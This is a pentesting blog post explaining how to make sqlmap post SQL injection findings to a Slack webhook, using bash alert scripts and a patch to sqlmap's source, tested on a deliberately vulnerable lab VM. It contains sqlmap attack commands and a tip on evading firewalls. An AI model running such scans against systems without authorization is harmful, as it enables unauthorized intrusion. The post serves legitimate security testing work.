Categories
web assessments

Slacking off with sqlmap

When working through web assessments, it becomes apparent real quick that automating some of your scans/setup can be a solid strategy. One efficient way of being notified of different results from your scans is through the use of Slack's webhooks. This post was inspired by Kamil Vavra's post found here, and recounts how these webhooks can be utilized to alert when SQL injection vulnerabilities are found.

Setup for Slack

For this first part, I've created a Slack workspace and custom channel, which will house the app used in this sqlmap demo.

Then I created an app, following the documentation found here, that will use incoming webhooks to post messages to this newly created channel.

Activate webhooks and and then add a new webhook to your workspace as seen below. I've covered the curl request so you hackers don't spam my channel.

Issue the sample curl request command and verify your app can send messages through this webhook.

Great, the app works, now to integrate sqlmap into this process and test it.

Tuning sqlmap and Testing

So now we have a Slack webhook we can utilize to send messages, we can make use of the --alert flag in sqlmap to execute a script/command when a possible SQLi is found. For this situation, I wrote a quick bash script as seen below:

alerter.sh

#!/bin/bash
results=`cat $1`
curl -X POST -H 'Content-type: application/json' --data "{'text':\"$results\"}" https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX

Replace the URL with that of your app's Webhook URL

I also made a slight modification to the ./sqlmap-dev/lib/controller/checks.py file to handle the way alerting is reported.

Original code (found near line 780)

...
if conf.alert:
    infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
    logger.info(infoMsg)

    try:
        process = subprocess.Popen(getBytes(conf.alert, sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
        process.wait()
    except Exception as ex:
        errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
        logger.error(errMsg)
...

Modified code

...
if conf.alert:
    infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
    logger.info(infoMsg)

    temp = conf.hostname
    filename = "/opt/sqlmap-dev/" + temp + ".txt"
    with open("%s" % filename, "w") as f:
        f.write("--- possible sqli found ---\n")
        f.write("URL: %s\n" % conf.url)
        f.write("Info: %s\n\n" % str(conf.parameters))
        f.close()

    command = conf.alert + " " + filename
    logger.info(command)
    process = subprocess.Popen(command, shell=True)
    process.wait()
...

To test this alerting system, I made use of Manuel Santander's Vulnerable Web Apps VM, found here. The nice thing about this VM is that it serves many of the intentionally vulnerable web apps, like DVWA, bWAPP, Juice Shop, and Mutillidae.

Once the VM is up and running the various applications, I targeted the Mutillidae application with this command:

python sqlmap.py -u http://192.168.13.128/mutillidae/index.php?page=user-info.php --batch --forms --flush --alert=./alerter.sh

Note: sqlmap has numerous flags that can be utilized to find various vulnerabilities. The ones used in this posting may not be the best usage for all situations

See below for sqlmap's output, how it finds the possible vulnerability, then alerts on it, executing the script alerter.sh.

And the alert:

One consideration when utilizing the --alert flag is that when sqlmap finds a potential injection point, it will first alert on it, and then attempt to verify the vulnerability. This has the potential to lead to false positives. A way to have our app check that sqlmap was successful in exploiting the vulnerability could look something below.

First create a verifier.sh script, and a results directory which will be checked. Note: this results directory should initially be empty, before executing the sqlmap command

verifier.sh

#!/bin/bash
if [ -f /opt/sqlmap-dev/results/*.csv ]; then
    results="--- verified sqli ---\n `cat /opt/sqlmap-dev/results/*.csv`"
else
    results="--- possible false positive ---"
fi
curl -X POST -H 'Content-type: application/json' --data "{'text':\"$results\"}" https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX

Then call it in the sqlmap command, with an output directory specified:

python sqlmap.py -u http://192.168.13.128/mutillidae/index.php?page=user-info.php --batch --forms --flush --alert=./alerter.sh --output-dir=./results; ./verifier.sh

Obviously, the above sqlmap commands used above won't find all injection points. It's important to read the supporting documentation and help output in order to customize the various flags used when performing your tests. Possible useful flags include:

  • --random-agent (can be useful in bypassing potential firewalls)
  • --delay (specify delay in between requests to not overload server)
  • --batch (to automatically select the default options when prompted)
  • --crawl (to follow links found on page an test them as well)

References

  • https://vavkamil.cz/2019/10/09/understanding-the-full-potential-of-sqlmap-during-bug-bounty-hunting/
  • https://github.com/sqlmapproject/sqlmap
  • Leave a Reply

    Your email address will not be published. Required fields are marked *

    three × one =